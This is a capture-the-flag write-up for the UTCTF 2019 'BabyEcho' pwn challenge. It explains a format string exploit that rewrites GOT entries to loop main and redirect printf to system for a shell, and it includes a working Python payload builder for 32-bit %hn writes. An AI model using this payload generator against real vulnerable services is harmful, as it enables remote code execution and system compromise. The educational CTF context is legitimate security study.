Tags: pwn


### writeup by P4W @ beerPWN sec-team

# UTCTF 2019 CTF
## BabyEcho (pwn, 700 pts)

Basic analysis of the binary.

```
$ file pwnable
pwnable: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ec115d32827da438599fe9b40b626d7214aa4e73, not stripped
```

```
gef➤  checksec
[+] checksec for 'pwnable'
Canary                        : No
NX                            : Yes
PIE                           : No
Fortify                       : No
RelRO                         : Partial
```

So the GOT is writable (Partial RELRO), which is fortunate for us.
By simply running the binary and passing `%p.%p.%p` as input we can verify that it is a format string challenge: the program echoes our input through printf(), so the `%p` conversions print stack values instead of the literal text.
The next step is to figure out how to exploit this.
Since the GOT is writable we can abuse the format string (the `%n`/`%hn` conversions) to overwrite entries in the GOT.
The first thing we do is overwrite the GOT entry of exit() with the address of main(): instead of terminating, the program restarts, and we get as many inputs as we need.
After that we leak a libc address with the format string, compute the address of system() from it (this needs the offsets of the libc used by the target), and overwrite printf@got with the address of system().
In this way we can drop a shell by just sending the string "sh" as input: it is passed to printf(), whose GOT entry now points to system(), so system("sh") gets called.
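The arbitrary write behind both GOT overwrites (exit@got -> main, printf@got -> system) is the classic two-`%hn` format string write. The following is an added example, not the exploit from the original writeup: it builds the payload for a 32-bit target with plain Python (no pwntools) and checks it against a small model of printf. The addresses `PRINTF_GOT` and `SYSTEM_ADDR` and the stack position `OFFSET` are hypothetical; against the real binary you would read printf@got from the ELF (no PIE, so it is fixed), derive system() from the leaked libc address, and find `OFFSET` by probing with `%p.%p.%p...` or `%<k>$p`.

```python
import re
import struct

# Hypothetical values for the demonstration (the page does not give them):
# printf@got is fixed because the binary has no PIE, the system() address
# would be computed from the libc leak at run time.
PRINTF_GOT = 0x0804A010
SYSTEM_ADDR = 0xF7E0C2E0
# Hypothetical printf argument position at which our input buffer starts
# on the stack, found by probing the real binary with %p.%p.%p... / %<k>$p.
OFFSET = 7


def fmt_write32(addr: int, value: int, offset: int) -> bytes:
    """Format string that writes the 32-bit `value` to `addr` (32-bit target).

    The two target addresses (addr, addr+2) go first so they sit at printf
    argument positions `offset` and `offset+1`; each halfword is then stored
    with %<k>$hn after padding the output count with %<pad>c. Mixing the
    sequential %c with positional %k$hn is technically undefined in C but
    works on glibc, which is what exploits rely on.
    """
    payload = struct.pack("<II", addr, addr + 2)
    if b"\x00" in payload:
        # a NUL would terminate the format string before the conversions
        raise ValueError("target address contains a NUL byte")
    written = len(payload)
    halves = [(value & 0xFFFF, offset), ((value >> 16) & 0xFFFF, offset + 1)]
    # write the smaller halfword first so every padding step is non-negative
    for target, argidx in sorted(halves):
        pad = (target - written) % 0x10000
        if pad:
            payload += b"%%%dc" % pad
            written += pad
        payload += b"%%%d$hn" % argidx
    return payload


_SPEC = re.compile(rb"%(\d*)(\$hn|\$n|c)")


def simulate_printf(fmt: bytes, args: list, mem: dict) -> int:
    """Model of the printf subset the payload relies on: %<n>c, %<k>$hn, %<k>$n.

    `args[k-1]` is what printf would read as positional argument k; `mem`
    maps address -> byte and receives the %n/%hn stores. Returns the number
    of characters "printed", i.e. the value %n would write.
    """
    count = 0
    i = 0
    while i < len(fmt):
        m = _SPEC.match(fmt, i)
        if m is None:
            count += 1  # ordinary byte, printed as-is
            i += 1
            continue
        num, conv = m.group(1), m.group(2)
        if conv == b"c":
            count += max(int(num or 1), 1)
        else:
            addr = args[int(num) - 1]
            size = 2 if conv == b"$hn" else 4
            for k in range(size):
                mem[addr + k] = (count >> (8 * k)) & 0xFF
        i = m.end()
    return count


def write_and_read_back(addr: int, value: int, offset: int) -> int:
    """Build the payload, feed it to the model as if our input buffer sat at
    argument `offset`, and return the dword that ends up stored at `addr`."""
    payload = fmt_write32(addr, value, offset)
    padded = payload + b"\x00" * (-len(payload) % 4)
    # the input buffer itself is what printf sees from argument `offset` on
    args = [0] * (offset - 1) + list(struct.unpack("<%dI" % (len(padded) // 4), padded))
    mem = {}
    simulate_printf(payload, args, mem)
    return int.from_bytes(bytes(mem.get(addr + k, 0) for k in range(4)), "little")


if __name__ == "__main__":
    print(fmt_write32(PRINTF_GOT, SYSTEM_ADDR, OFFSET))
    print(hex(write_and_read_back(PRINTF_GOT, SYSTEM_ADDR, OFFSET)))
```

Against the real service the same payload is sent twice: once with exit@got and the address of main(), then, after the leak, with printf@got and the computed system() address, followed by the input "sh". The NUL check matters because the input is a C string: an address such as 0x08040010 could not be placed in the format string this way.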
Here you can find the full exploit.

Original writeup (https://github.com/beerpwn/ctf/tree/master/2019/UTCTF_ctf/pwn/baby_echo).